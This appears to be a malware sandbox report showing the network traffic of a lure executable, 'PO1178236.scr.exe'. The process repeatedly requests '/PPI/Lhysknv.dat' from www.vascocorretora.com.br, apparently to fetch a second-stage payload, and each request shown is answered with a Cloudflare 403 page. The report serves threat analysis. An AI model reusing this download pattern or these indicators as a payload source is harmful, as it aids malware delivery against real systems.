        Jan 9, 2025 08:38:56.543581963 CET44350000188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:56.543652058 CET50000443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:56.543970108 CET50000443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:56.543979883 CET44350000188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.025448084 CET44350000188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.027461052 CET50000443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:57.027493954 CET44350000188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.172488928 CET44350000188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.172616959 CET44350000188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.172657013 CET50000443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:57.172683001 CET44350000188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.172898054 CET44350000188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.172935009 CET50000443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:57.172950983 CET44350000188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.173043966 CET44350000188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.173084021 CET50000443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:57.173752069 CET50000443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:57.174607038 CET50001443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:57.174639940 CET44350001188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.174701929 CET50001443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:57.174938917 CET50001443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:57.174953938 CET44350001188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.649614096 CET44350001188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.654210091 CET50001443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:57.654222965 CET44350001188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.795901060 CET44350001188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.795959949 CET44350001188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.795994997 CET44350001188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.796027899 CET44350001188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.796056032 CET50001443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:57.796077013 CET44350001188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.796103001 CET50001443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:57.796137094 CET44350001188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.798501968 CET50001443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:57.798801899 CET50001443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:57.799364090 CET50002443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:57.799417973 CET44350002188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:57.799490929 CET50002443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:57.799746037 CET50002443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:57.799760103 CET44350002188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:58.312122107 CET44350002188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:58.316158056 CET50002443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:58.316200018 CET44350002188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:58.458206892 CET44350002188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:58.458259106 CET44350002188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:58.458292007 CET44350002188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:58.458328009 CET44350002188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:58.458446026 CET50002443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:58.458482981 CET44350002188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:58.458515882 CET50002443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:58.463100910 CET44350002188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:58.466609001 CET50002443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:58.467370033 CET50002443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:58.468862057 CET50003443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:58.468923092 CET44350003188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:58.470596075 CET50003443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:58.471648932 CET50003443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:58.471676111 CET44350003188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:58.942914963 CET44350003188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:58.944780111 CET50003443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:58.944799900 CET44350003188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.095454931 CET44350003188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.095524073 CET44350003188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.095560074 CET44350003188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.095598936 CET44350003188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.095707893 CET44350003188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.095798016 CET50003443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:59.095798016 CET50003443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:59.097110987 CET50003443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:59.097110987 CET50003443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:59.097847939 CET50004443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:59.097898006 CET44350004188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.097973108 CET50004443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:59.098264933 CET50004443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:59.098284006 CET44350004188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.553025007 CET44350004188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.599042892 CET50004443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:59.855438948 CET50004443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:59.855479956 CET44350004188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.955212116 CET44350004188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.955260992 CET44350004188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.955293894 CET44350004188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.955303907 CET50004443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:59.955338001 CET44350004188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.955369949 CET50004443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:59.955377102 CET44350004188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.955385923 CET44350004188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.955425978 CET50004443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:59.955431938 CET44350004188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.955466032 CET44350004188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.955499887 CET50004443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:59.955908060 CET50004443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:59.956485987 CET50005443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:59.956558943 CET44350005188.114.96.3192.168.2.9
        Jan 9, 2025 08:38:59.956625938 CET50005443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:59.956815004 CET50005443192.168.2.9188.114.96.3
        Jan 9, 2025 08:38:59.956830978 CET44350005188.114.96.3192.168.2.9
        Jan 9, 2025 08:39:00.416028023 CET44350005188.114.96.3192.168.2.9
        Jan 9, 2025 08:39:00.463016033 CET50005443192.168.2.9188.114.96.3
        TimestampSource PortDest PortSource IPDest IP
        Jan 9, 2025 08:35:54.420275927 CET5595853192.168.2.91.1.1.1
        Jan 9, 2025 08:35:54.670063972 CET53559581.1.1.1192.168.2.9
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Jan 9, 2025 08:35:54.420275927 CET192.168.2.91.1.1.10x76a8Standard query (0)www.vascocorretora.com.brA (IP address)IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Jan 9, 2025 08:35:54.670063972 CET1.1.1.1192.168.2.90x76a8No error (0)www.vascocorretora.com.br188.114.96.3A (IP address)IN (0x0001)false
        Jan 9, 2025 08:35:54.670063972 CET1.1.1.1192.168.2.90x76a8No error (0)www.vascocorretora.com.br188.114.97.3A (IP address)IN (0x0001)false
        • www.vascocorretora.com.br
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.949707188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:35:55 UTC90OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        Connection: Keep-Alive
        2025-01-09 07:35:55 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:35:55 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:10 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qu5jXw8KN2hmxtxhLea2Y%2BrAS6e0VBOVYvJLGZJNFExR4jnoMjTyWNRJ1jmjbcy6S0xhqC8gaFSQnmhplSPVCIy29TL8vDnns7FaL0%2FybZ3NVcXLUMwYOMkP2U30uqqBlg7BaEwdjpIJ%2F96Q"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c0dbe9b81875-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1648&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1660034&cwnd=153&unsent_bytes=0&cid=089f531add810e65&ts=346&x=0"
        2025-01-09 07:35:55 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:35:55 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:35:55 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:35:55 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 30 64 62 65 39 62 38 31 38 37 35 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c0dbe9b81875</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:35:55 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 30 64 62 65 39 62 38 31 38 37 35 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 31 4e 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c0dbe9b81875',t:'MTczNjQwODE1NS4wMDAwMDA='};var a
        2025-01-09 07:35:55 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.949708188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:35:56 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:35:56 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:35:56 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:11 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kXS%2B9GFMQFhuNzdUeZyNlnTaQT4l8x2nftom3IzQOdohJ%2FdO10AX09o0pQnwwKAjU9IaicZdiI0WkVTF3wBNkHTh3hSb1A1yrNmatneqTRAYBZeK1ttNorH8zJFTF7YV%2FAAyiLJdJZmCSOTQ"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c0e12cc9c445-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1706&rtt_var=649&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1711606&cwnd=232&unsent_bytes=0&cid=3d2515e337f8be02&ts=341&x=0"
        2025-01-09 07:35:56 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:35:56 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:35:56 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:35:56 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 30 65 31 32 63 63 39 63 34 34 35 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c0e12cc9c445</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:35:56 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 30 65 31 32 63 63 39 63 34 34 35 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 31 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c0e12cc9c445',t:'MTczNjQwODE1Ni4wMDAwMDA='};var a
        2025-01-09 07:35:56 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.2.949709188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:35:56 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:35:57 UTC1003INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:35:56 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:11 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LotxgB1uUdpsbNu35VKNYZXh5kZ7BxpWFS2asNBv23EgriARUoyaHYpm0UO0qJg7VXTOvoAtKFiCDu4%2B45aj7ghDeIaVVr3vIOFywKT1wNG4lIItisrzwHIYzXjHoARMvLeEQtCIYGBd9%2BV8"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c0e50a0d7285-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1960&min_rtt=1956&rtt_var=742&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1465863&cwnd=249&unsent_bytes=0&cid=cbf27c8ba21a31e7&ts=147&x=0"
